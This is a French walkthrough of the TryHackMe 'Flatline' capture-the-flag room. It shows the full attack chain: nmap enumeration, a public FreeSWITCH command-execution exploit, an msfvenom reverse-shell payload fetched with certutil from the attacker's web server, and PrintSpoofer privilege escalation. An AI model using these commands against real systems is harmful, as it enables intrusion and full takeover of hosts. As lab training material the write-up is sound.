Flatline – Walkthrough Fr | TryHackMe – Write-up

How low are your morals?

 

Flatline est un CTF easy de TryHackme. C’est tout ce qu’il y a de plus classique. Énumération, trouver l’exploit, effectuer l’escalade de privilège. 

Enumération

Commande :

nmap -sV -sC -p- -T5 10.10.135.236 -Pn

 

Il y a un service qui tourne sur le port 8021. Il s’agit de freeswitch.

Recherche de vulnérabilité – freeswitch :

searchsploit freeswitch

Le fichier 47799.txt contient un exploit écrit en python. Il faut le renommer en .py

Commande :

mv 47799.txt 47799.py

Initial Foothold

L’exploit fonctionne-t-il ? Le service est-il vulnérable. On a en fait pas beaucoup d’information relative au service en lui-même. Un seul moyen de savoir c’est de tester…

Commande :

python3.9 47799.py 10.10.135.236 whoami

Résultat :

 

L’exploit fonctionne. On a pu obtenir le nom de l’utilisateur qui fait tourner le service. 

Il faut maintenant aller un peu plus loin pour obtenir un reverse shell. 

Création d’un payload

Commande :

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.38.124 LPORT=4444 -f exe -o sr.exe

 

Téléchargement du payload sur la cible

Mise en place d’un serveur web Kali :

python3.9 -m http.server 8787

 

Commande :

python3.9 47799.py 10.10.135.236 ‘certutil -urlcache -split -f http://10.11.38.124:8787/sr.exe

 

Execution du payload

Mise en place d’un écouteur netcat :

nc -nlvp 4444

Commande :

python3.9 47799.py 10.10.135.236 ‘sr.exe’

 

Réception du reverse shell :

 

Escalade de privilège.

Commande :

whoami /priv

L’utilisateur a des droits SeImpersonatePrivilege

Printerspoofer

Pour augmenter ses privilege via SeImpersonatePrivilege, il est possible d’utiliser l’exploit printerspoofer.exe disponible a cette adresse. 

Téléchargement :

certutil -urlcache -split -f http://10.11.38.124:8787/PrintSpoofer.exe

Commande :

PrintSpoofer.exe -i -c cmd

 

#

That’s all folks

Merci d’avoir pris la peine de venir sur le site de lire ce Write Up

J’espère qu’il vous a plus et qu’il vous apprit des nouvelles choses.

N’hésitez pas à laisse un commentaire ou à partager cet article. 

Facebook
Twitter
LinkedIn
Pinterest